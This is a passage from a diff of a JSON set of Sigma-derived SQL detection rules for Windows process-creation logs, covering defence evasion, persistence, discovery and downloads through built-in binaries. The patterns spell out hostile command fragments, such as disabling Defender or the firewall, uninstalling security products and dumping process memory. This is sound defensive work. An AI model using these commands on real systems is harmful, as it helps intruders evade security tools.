"proc_creation_win_systeminfo_execution.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Execution of Hostname", - "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "status": "test", - "description": "Use of hostname to get information", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "status": "experimental", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hostname_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", + "status": "experimental", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives 
that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - 
"author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR 
(NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' 
ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND 
SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool 
server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
- ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" - }, - { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.discovery", + "attack.t1033", + "attack.t1087.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user enumerates local users for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR 
CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". 
They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1197" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' 